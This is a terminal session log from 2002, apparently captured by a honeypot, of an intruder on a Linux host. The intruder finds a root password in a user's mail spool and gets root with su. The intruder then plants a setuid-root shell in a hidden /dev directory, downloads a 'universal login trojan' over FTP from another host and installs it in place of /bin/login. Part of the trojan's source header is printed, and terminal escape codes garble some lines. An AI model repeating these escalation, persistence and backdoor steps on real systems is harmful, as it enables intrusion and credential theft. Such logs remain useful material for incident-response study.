wtmp begins Sat Jun 15 09:32:20 2002
[jdoe@saphe4
jdoe]$ echo $SHELL
/bin/bash
[jdoe@saphe4
jdoe]$ ls -la
total 24
drwx------
2 jdoe jdoe
4096 Jun 24 18:34 .
drwxr-xr-x
7 root root
4096 Jun 24 06:48 ..
-rw-------
1 jdoe jdoe
0 Jun 24 18:34 .bash_history
-rw-r--r--
1 jdoe jdoe
24 Jun 24 06:48 .bash_logout
-rw-r--r--
1 jdoe jdoe
259 Jun 24 17:46 .bash_profile
-rw-r--r--
1 jdoe jdoe
124 Jun 24 06:48 .bashrc
-rw-r--r--
1 jdoe jdoe
3394 Jun 24 06:48 .screenrc
[jdoe@saphe4
jdoe]$ /bin/csh
[jdoe@saphe4
~]$ ls -la[6D[Kcat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP
User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X
Font Server:/etc/X11/fs:/bin/false
rbarnett:x:500:500::/home/rbarnett:/bin/bash
jdoe:x:501:501:Test
Account:/home/jdoe:/bin/bash
[jdoe@saphe4
~]$ cat /etc/shadow
cat: /etc/shadow: Permission denied
[jdoe@saphe4
~]$ ./[K[K/[Kcat /etc/group
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root
lp:x:7:daemon,lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:
games:x:20:
gopher:x:30:
dip:x:40:
ftp:x:50:
nobody:x:99:
users:x:100:
floppy:x:19:
xfs:x:43:
console:x:31:
utmp:x:22:
pppusers:x:44:
popusers:x:45:
slipusers:x:46:
slocate:x:21:
rbarnett:x:500:
jdoe:x:501:
[jdoe@saphe4
~]$ ps -ef
UID
PID PPID C STIME TTY
TIME CMD
root
1 0 0 06:51 ?
00:00:06 init [3]
root
2 1 0 06:51 ?
00:00:00 [kflushd]
root
3 1 0 06:51 ?
00:00:00 [kupdate]
root
4 1 0 06:51 ?
00:00:00 [kpiod]
root
5 1 0 06:51 ?
00:00:05 [kswapd]
root
6 1 0 06:52 ?
00:00:00 [mdrecoveryd]
bin
323 1 0 06:52 ?
00:00:00 [portmap]
root
338 1 0 06:53 ?
00:00:00 [lockd]
root
339 338 0 06:53 ?
00:00:00 [rpciod]
root
348 1 0 06:53 ?
00:00:00 [rpc.statd]
root
362 1 0 06:53 ?
00:00:00 [apmd]
root
413 1 0 06:53 ?
00:00:00 syslogd -m 0
root
422 1 0 06:53 ?
00:00:00 klogd
nobody
436 1 0 06:53 ?
00:00:00 [identd]
nobody
438 436 0 06:53 ?
00:00:00 [identd]
nobody
439 438 0 06:53 ?
00:00:00 [identd]
nobody
441 438 0 06:53 ?
00:00:00 [identd]
nobody
443 438 0 06:53 ?
00:00:00 [identd]
daemon
454 1 0 06:53 ?
00:00:00 /usr/sbin/atd
root
468 1 0 06:53 ?
00:00:00 crond
root
486 1 0 06:53 ?
00:00:00 inetd
root
500 1 0 06:53 ?
00:00:00 [lpd]
root
544 1 0 06:53 ?
00:00:00 sendmail: accepting connections on port 25
root
559 1 0 06:53 ?
00:00:00 gpm -t ps/2
xfs
593 1 0 06:53 ?
00:00:00 xfs -droppriv -daemon -port -1
root
632 1 0 06:53 tty2
00:00:00 [mingetty]
root
633 1 0 06:53 tty3
00:00:00 [mingetty]
root
634 1 0 06:53 tty4
00:00:00 [mingetty]
root
635 1 0 06:53 tty5
00:00:00 [mingetty]
root
636 1 0 06:53 tty6
00:00:00 [mingetty]
root
8686 1 0 18:17 tty1
00:00:00 login -- root
root
8687 8686 0 18:17 tty1 00:00:00 -bash
root
9043 486 0 18:36 ?
00:00:00 in.telnetd: 10.XXX.XXX.60
root
9044 9043 0 18:36 pts/0 00:00:00 login --
jdoe
jdoe
9045 9044 0 18:36 pts/0 00:00:00 -bash
jdoe
9065 9045 0 18:36 pts/0 00:00:00 bash /usr/bin/bash_check.sh
jdoe
9066 9065 0 18:36 pts/0 00:00:00 /usr/bin/bash_check
jdoe
9067 9066 0 18:36 pts/0 00:00:00 /usr/bin/bash_check
jdoe
9068 9067 0 18:36 pts/1 00:00:00 bash -i
jdoe
9081 9068 0 18:37 pts/1 00:00:00 -bin/csh
jdoe
9086 9081 0 18:38 pts/1 00:00:00 ps -ef
[jdoe@saphe4
~]$ pwd
/home/jdoe
[jdoe@saphe4
~]$ find / -type f -mtime -1 | xargs grep ro[K-i root | grep
-i passwd > test
find: /home/ftp/bin:
Permission denied
find: /home/ftp/etc:
Permission denied
find: /home/rbarnett:
Permission denied
find: /var/lib/nfs/sm:
Permission denied
find: /var/lib/nfs/sm.bak:
Permission denied
find: /var/lib/slocate:
Permission denied
find: /var/log/samba:
Permission denied
find: /var/spool/at:
Permission denied
find: /var/spool/cron:
Permission denied
find: /proc/1/fd:
Permission denied
find: /proc/2/fd:
Permission denied
find: /proc/3/fd:
Permission denied
find: /proc/4/fd:
Permission denied
find: /proc/5/fd:
Permission denied
find: /proc/6/fd:
Permission denied
find: /proc/323/fd:
Permission denied
find: /proc/338/fd:
Permission denied
find: /proc/339/fd:
Permission denied
find: /proc/348/fd:
Permission denied
find: /proc/362/fd:
Permission denied
find: /proc/413/fd:
Permission denied
find: /proc/422/fd:
Permission denied
find: /proc/436/fd:
Permission denied
find: /proc/438/fd:
Permission denied
find: /proc/439/fd:
Permission denied
find: /proc/441/fd:
Permission denied
find: /proc/443/fd:
Permission denied
find: /proc/454/fd:
Permission denied
find: /proc/468/fd:
Permission denied
find: /proc/486/fd:
Permission denied
find: /proc/500/fd:
Permission denied
find: /proc/544/fd:
Permission denied
find: /proc/559/fd:
Permission denied
find: /proc/593/fd:
Permission denied
find: /proc/632/fd:
Permission denied
find: /proc/633/fd:
Permission denied
find: /proc/634/fd:
Permission denied
find: /proc/635/fd:
Permission denied
find: /proc/636/fd:
Permission denied
find: /proc/8686/fd:
Permission denied
find: /proc/8687/fd:
Permission denied
find: /proc/9043/fd:
Permission denied
find: /proc/9044/fd:
Permission denied
find: /proc/9088/fd/4:
No such file or directory
find: /etc/default:
Permission denied
find: /root:
Permission denied
grep: /var/lib/nfs/state:
Permission denied
grep: /var/log/messages:
Permission denied
grep: /var/log/secure:
Permission denied
grep: /var/log/maillog:
Permission denied
grep: /var/log/xferlog:
Permission denied
grep: /var/log/cron:
Permission denied
grep: /var/run/random-seed:
Permission denied
grep: /var/spool/mail/root:
Permission denied
grep: /var/spool/mqueue/qfMAA04625:
Permission denied
grep: /var/spool/mqueue/dfMAA04625:
Permission denied
grep: /proc/ide/ide1/hdc/settings:
Permission denied
grep: /proc/ide/ide1/hdc/identify:
Permission denied
grep: /proc/kcore:
Permission denied
grep: /proc/sys/net/ipv4/route/flush:
Invalid argument
grep: /proc/sys/net/unix/max_dgram_qlen:
Permission denied
grep: /proc/sys/vm/page-cluster:
Permission denied
grep: /proc/sys/vm/pagetable_cache:
Permission denied
grep: /proc/sys/vm/bdflush:
Permission denied
grep: /proc/sys/kernel/cap-bound:
Permission denied
grep: /proc/net/ip_fwnames:
Permission denied
grep: /proc/net/ip_fwchains:
Permission denied
grep: /proc/kmsg:
Permission denied
grep: /proc/1/environ:
Permission denied
grep: /proc/1/mem:
Permission denied
grep: /proc/2/environ:
Permission denied
grep: /proc/2/mem:
Permission denied
grep: /proc/3/environ:
Permission denied
grep: /proc/3/mem:
Permission denied
grep: /proc/4/environ:
Permission denied
grep: /proc/4/mem:
Permission denied
grep: /proc/5/environ:
Permission denied
grep: /proc/5/mem:
Permission denied
grep: /proc/6/environ:
Permission denied
grep: /proc/6/mem:
Permission denied
grep: /proc/323/environ:
Permission denied
grep: /proc/323/mem:
Permission denied
grep: /proc/338/environ:
Permission denied
grep: /proc/338/mem:
Permission denied
grep: /proc/339/environ:
Permission denied
grep: /proc/339/mem:
Permission denied
grep: /proc/348/environ:
Permission denied
grep: /proc/348/mem:
Permission denied
grep: /proc/362/environ:
Permission denied
grep: /proc/362/mem:
Permission denied
grep: /proc/413/environ:
Permission denied
grep: /proc/413/mem:
Permission denied
grep: /proc/422/environ:
Permission denied
grep: /proc/422/mem:
Permission denied
grep: /proc/436/environ:
Permission denied
grep: /proc/436/mem:
Permission denied
grep: /proc/438/environ:
Permission denied
grep: /proc/438/mem:
Permission denied
grep: /proc/439/environ:
Permission denied
grep: /proc/439/mem:
Permission denied
grep: /proc/441/environ:
Permission denied
grep: /proc/441/mem:
Permission denied
grep: /proc/443/environ:
Permission denied
grep: /proc/443/mem:
Permission denied
grep: /proc/454/environ:
Permission denied
grep: /proc/454/mem:
Permission denied
grep: /proc/468/environ:
Permission denied
grep: /proc/468/mem:
Permission denied
grep: /proc/486/environ:
Permission denied
grep: /proc/486/mem:
Permission denied
grep: /proc/500/environ:
Permission denied
grep: /proc/500/mem:
Permission denied
grep: /proc/544/environ:
Permission denied
grep: /proc/544/mem:
Permission denied
grep: /proc/559/environ:
Permission denied
grep: /proc/559/mem:
Permission denied
grep: /proc/593/environ:
Permission denied
grep: /proc/593/mem:
Permission denied
grep: /proc/632/environ:
Permission denied
grep: /proc/632/mem:
Permission denied
grep: /proc/633/environ:
Permission denied
grep: /proc/633/mem:
Permission denied
grep: /proc/634/environ:
Permission denied
grep: /proc/634/mem:
Permission denied
grep: /proc/635/environ:
Permission denied
grep: /proc/635/mem:
Permission denied
grep: /proc/636/environ:
Permission denied
grep: /proc/636/mem:
Permission denied
grep: /proc/8686/environ:
Permission denied
grep: /proc/8686/mem:
Permission denied
grep: /proc/8687/environ:
Permission denied
grep: /proc/8687/mem:
Permission denied
grep: /proc/9043/environ:
Permission denied
grep: /proc/9043/mem:
Permission denied
grep: /proc/9044/environ:
Permission denied
grep: /proc/9044/mem:
Permission denied
grep: /proc/9045/mem:
No such process
grep: /proc/9065/mem:
No such process
grep: /proc/9066/mem:
No such process
grep: /proc/9067/mem:
No such process
grep: /proc/9068/mem:
No such process
grep: /proc/9081/mem:
No such process
grep: /proc/9088/statm:
No such file or directory
grep: /proc/9088/stat:
No such file or directory
grep: /proc/9088/cmdline:
No such file or directory
grep: /proc/9088/environ:
No such file or directory
grep: /proc/9088/mem:
No such file or directory
grep: /proc/9088/status:
No such file or directory
grep: /etc/group-:
Permission denied
grep: /etc/shadow-:
Permission denied
grep: /etc/gshadow-:
Permission denied
grep: /etc/shadow:
Permission denied
grep: /etc/gshadow:
Permission denied
grep: /etc/ioctl.save:
Permission denied
[jdoe@saphe4
~]$ ls -l
total 4
-rw-rw-r--
1 jdoe jdoe
348 Jun 24 18:38 test
[jdoe@saphe4
~]$ cat test
/var/spool/mail/rbarnett:Here is the new root passwd - <C3_P0>
/etc/passwd:root:x:0:0:root:/root:/bin/bash
/etc/passwd:operator:x:11:0:operator:/root:
/etc/passwd-:root:x:0:0:root:/root:/bin/bash
/etc/passwd-:operator:x:11:0:operator:/root:
[jdoe@saphe4
~]$ su root
Password:
su: incorrect password
[jdoe@saphe4
~]$ su root
Password:
su: incorrect password
[jdoe@saphe4
~]$ su root
Password:
[root@saphe4
jdoe]# id
uid=0(root)
gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@saphe4
jdoe]# pwd
/home/jdoe
[root@saphe4
jdoe]# who
root
tty1 Jun 24 18:17
jdoe
pts/0 Jun 24 18:36
[root@saphe4
jdoe]# mkdir /dev/".. "
[root@saphe4
jdoe]# cd /dev/".. "
[root@saphe4
.. ]# cp /bin/sh .
[root@saphe4
.. ]# ls -l
[00mtotal 313
-rwxr-xr-x
1 root root
316848 Jun 24 18:40 [01;32msh[00m
[m[root@saphe4
.. ]# chmod 4555 sh
[root@saphe4
.. ]# mv sh test
[root@saphe4
.. ]# ls -l
[00mtotal 313
-r-sr-xr-x
1 root root
316848 Jun 24 18:40 [01;32mtest[00m
[m[root@saphe4
.. ]# ftp 10.XXX.XXX.60
Connected to
10.XXX.XXX.60.
220 saphe2 FTP
server (This system is for authorized users only. All transfers are logged.)
ready.
Name (10.XXX.XXX.60:root): jdoe
331 Password
required for jdoe.
Password:
530 Login incorrect.
Login failed.
Remote system
type is UNIX.
Using binary
mode to transfer files.
ftp> user
jdoe
331 Password
required for jdoe.
Password:
230 User jdoe
logged in.
ftp> bin
200 Type set
to I.
ftp> hash
Hash mark printing
on (1024 bytes/hash mark).
ftp> get
bingo.c
local: bingo.c
remote: bingo.c
200 PORT command
successful.
150 Binary data
connection for bingo.c (10.XXX.XXX.53,1041) (1346 bytes).
#
226 Binary Transfer
complete.
1346 bytes received
in 0.0032 secs (4.1e+02 Kbytes/sec)
ftp> bye
221 Goodbye.
[root@saphe4
.. ]# ls
[00m[01;32mtest[00m
[00mbingo.c[00m
[m[root@saphe4
.. ]# vu i bingo.c
[?1h=[1;30r[H[J[30;1H"bingo.c"
51L, 1346C[1;1H/*
* PRIVATE
!! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
*
Universal login trojan by Tragedy/Dor
*[14CEmail:
rawpower@iname.com
*[14CIRC:
[Dor]@ircnet
*
*
Login trojan for pretty much any O/S...
*
Tested on: Linux, BSDI 2.0, FreeBSD, IRIX 6.x, 5.x, Sunos 5.5,5.6,5.7
*[19COSF1/DGUX4.0,
*
Known not to work on:
*[14CSunOS
4.x and 5.4... Seems the only variable passwd to login
*[14Con
these versions of SunOS is the $TERM... and its passed via
*[14Ccommandline
option... should be easy to work round in time
*
*
#define[9CPASSWORD - Set your password here
*
#define[9C_PATH_LOGIN - This is where you moved the original login to
*
login to hacked host with...
*
from bourne shell (sh, bash) sh DISPLAY="your pass";export DISPLAY;telnet
host
*
*/
#include[8C<stdio.h>
#if !defined(PASSWORD)
#define[9CPASSWORD[8C"j4l0n3n"
#endif
#if !defined(_PATH_LOGIN)
# define[16C_PATH_LOGIN
"/bin/login"
#endif[1;1H
#define[8C PASSWOR[8C
"j4l4l0n3n"[24;41H[K[24;34Hl0n3n"[24;40H[K[24;34H0n3n"[24;39H[K[24;34Hn3n"[24;38H[K[24;34H3n"[24;37H[K[24;34Hn"[24;36H[K[24;34H"[24;35H[K[24;34H[30;1H[1m--
INSERT --[m[30;13H[K[24;34Ht"o"o"r"[30;1H[K[24;37H[25;6H[26;25H[27;37H
"/in/login"[27;52H[K[27;43Hn/login"[27;51H[K[27;43H/login"[27;50H[K[27;43H
[1m-- INSERT
--[27;43H[md/login"[27;44He/login"[27;45Hv/login"[27;46H//login"[27;47H./login"[27;48H./login"[27;49H
/login"[27;50H[30;1H[K[27;49H
:wq!
"bingo.c" 51L,
1347C written
[?1l>
[root@saphe4
.. ]# gcc -o login.new bingo.c
ulogin.c: In function `main':
ulogin.c:35: warning: initialization makes pointer from integer without a cast
[root@saphe4
.. ]# ls -l
[00mtotal 329
-rwxrwxr-x
1 root root
12344 Jun 24 18:41 [01;32mlogin.new[00m
-r-sr-xr-x
1 root root
316848 Jun 24 18:40 [01;32mtest[00m
-rw-rw-r--
1 root root
1347 Jun 24 18:41 [00mbingo.c[00m
[m[root@saphe4
.. ]# mv /bin/login .
[root@saphe4
.. ]# cp logion n.new /bin/login
[root@saphe4
.. ]# ls -l
[00mtotal 350
-rwxr-xr-x
1 root root
20452 Mar 7 2000 [01;32mlogin[00m
-rwxrwxr-x
1 root root
12344 Jun 24 18:41 [01;32mlogin.new[00m
-r-sr-xr-x
1 root root
316848 Jun 24 18:40 [01;32mtest[00m
-rw-rw-r--
1 root root
1347 Jun 24 18:41 [00mbingo.c[00m
[m[root@saphe4
.. ]# exit
exit
[jdoe@saphe4
~]$ id
uid=501(jdoe)
gid=501(jdoe) groups=501(jdoe)
[jdoe@saphe4
~]$ /dev/..[K[K".. "/test
[jdoe@saphe4
jdoe]# id
uid=501(jdoe)
gid=501(jdoe) euid=0(root) groups=501(jdoe)
[jdoe@saphe4
jdoe]# exit
exit
[jdoe@saphe4
~]$ id
uid=501(jdoe)
gid=501(jdoe) groups=501(jdoe)
[jdoe@saphe4
~]$ echo $DISPLAY
saphe2:10.0
[jdoe@saphe4
~]$ DISPLAY=toor
DISPLAY=toor:
Command not found.
[jdoe@saphe4
~]$ echo $SHELL
/bin/bash
[jdoe@saphe4
~]$ exit
exit
[jdoe@saphe4
jdoe]$ DISPLAY=toor ls -la
[00mtotal 32
drwx------
2 jdoe jdoe
4096 Jun 24 18:38 [01;34m.[00m
drwxr-xr-x
7 root root
4096 Jun 24 06:48 [01;34m..[00m
-rw-------
1 jdoe jdoe
8 Jun 24 18:42 [00m.bash_history[00m
-rw-r--r--
1 jdoe jdoe
24 Jun 24 06:48 [00m.bash_logout[00m
-rw-r--r--
1 jdoe jdoe
259 Jun 24 17:46 [00m.bash_profile[00m
-rw-r--r--
1 jdoe jdoe
124 Jun 24 06:48 [00m.bashrc[00m
-rw-r--r--
1 jdoe jdoe
3394 Jun 24 06:48 [00m.screenrc[00m
-rw-rw-r--
1 jdoe jdoe
348 Jun 24 18:38 [00mtest[00m
[m[jdoe@saphe4
jdoe]$ history
1 id
2 who
3 last -5
4 echo $SHELL
5 /bin/csh
6 ls -la
7 history
[jdoe@saphe4
jdoe]$ exit
exit
Script done on Mon Jun 24 18:43:48 2002
MD5 (/tmp/.Xconfig.old) = 8380d80f727c35fcded5a3ec66876b1b
sent 0, rcvd 18092